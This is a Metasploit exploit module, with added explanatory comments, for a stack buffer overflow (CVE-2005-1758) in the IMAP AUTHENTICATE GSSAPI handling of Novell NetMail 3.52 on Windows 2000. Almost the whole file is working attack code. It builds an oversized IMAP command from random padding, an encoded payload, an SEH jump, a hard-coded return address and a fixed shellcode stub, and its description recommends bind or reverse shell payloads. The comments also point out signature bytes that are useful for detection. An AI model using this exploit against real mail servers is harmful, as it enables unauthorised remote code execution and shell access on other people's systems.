##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for CVE-2005-1758: a stack buffer overflow in the IMAP
  # AUTHENTICATE GSSAPI handling of Novell NetMail 3.52 (see 'Description').
  # There is a single target (Windows 2000 SP0-SP4 English) keyed on one
  # hard-coded 'Ret' address, and no `check` method or version probe: the
  # module fires blind against whatever answers on RPORT.
  Rank = AverageRanking

  # Provides connect / sock / disconnect used in #exploit.
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the RPORT option (default 143, IMAP).
  #
  # @param info [Hash] metadata merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Novell NetMail IMAP AUTHENTICATE Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE
          GSSAPI command. By sending an overly long string, an attacker can overwrite the
          buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp
          or windows/shell_reverse_tcp allows for the most reliable results.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-1758' ],
          [ 'OSVDB', '55175' ]
        ],
        # Declares that the resulting session runs in the service's own
        # (elevated) context; nothing in the module verifies this.
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
        'Payload' => {
          'Space' => 850,
          # NUL, space, ',', ':' and '@' are excluded -- the whole buffer is
          # sent as one IMAP command line, so these are presumably the bytes
          # the server's command parser would split or stop on.
          'BadChars' => "\x00\x20\x2c\x3a\x40",
          # Six-byte x86 stub placed before the encoder's decoder: 81 c4 imm32
          # is `add esp, 0xfffff254`, moving esp well away from the decoder
          # (presumably so the in-place alphanumeric decoder is not clobbered
          # by its own stack use -- verify against the encoder in use).
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
        },
        'Platform' => 'win',
        'Targets' => [
          # One fixed return address; no other service-pack or language builds.
          [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],
        ],
        # NOTE(review): the CVE is a 2005 identifier while DisclosureDate is
        # 2007-01-07 -- confirm which date is intended.
        'DisclosureDate' => '2007-01-07',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been assessed.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([ Opt::RPORT(143) ])
  end

  # Builds the oversized AUTHENTICATE GSSAPI request, sends it in a single
  # write and hands off to the payload handler.
  #
  # Request layout, in send order:
  #   "A001 AUTHENTICATE GSSAPI\r\n"
  #   1258 random uppercase letters
  #   payload.encoded            (bounded by 'Space' = 850)
  #   "\xeb\x06"                 (x86 short jmp +6) + 2 random letters
  #   target.ret                 (32-bit little-endian, pack('V'))
  #   8 NOPs + the fixed 42-byte `jmp` stub + 700 random letters
  #   "\r\n" + "A002 LOGOUT\r\n"
  # Together with AllowWin32SEH in DefaultOptions, the jmp-over / address
  # pair suggests an SEH-record overwrite -- verify against the target.
  # Nothing is read back after the write; success is observable only
  # through the handler. The literal command tag/verb and the fixed total
  # size are the stable on-the-wire characteristics of this module.
  #
  # @return [void]
  def exploit
    connect
    # Read and discard whatever the server sends first (its greeting,
    # presumably); the content is not inspected.
    sock.get_once

    # Static 42-byte stub reused verbatim on every run (neither regenerated
    # nor passed through the encoder), so these bytes form a fixed signature.
    jmp = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
    jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
    jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

    sploit = "A001 AUTHENTICATE GSSAPI\r\n"
    sploit << rand_text_alpha_upper(1258) + payload.encoded + "\xeb\x06"
    sploit << rand_text_alpha_upper(2) + [target.ret].pack('V')
    sploit << make_nops(8) + jmp + rand_text_alpha_upper(700)

    print_status("Trying target #{target.name}...")
    # Overflow line and LOGOUT go out in one write.
    sock.put(sploit + "\r\n" + "A002 LOGOUT\r\n")

    handler
    disconnect
  end
end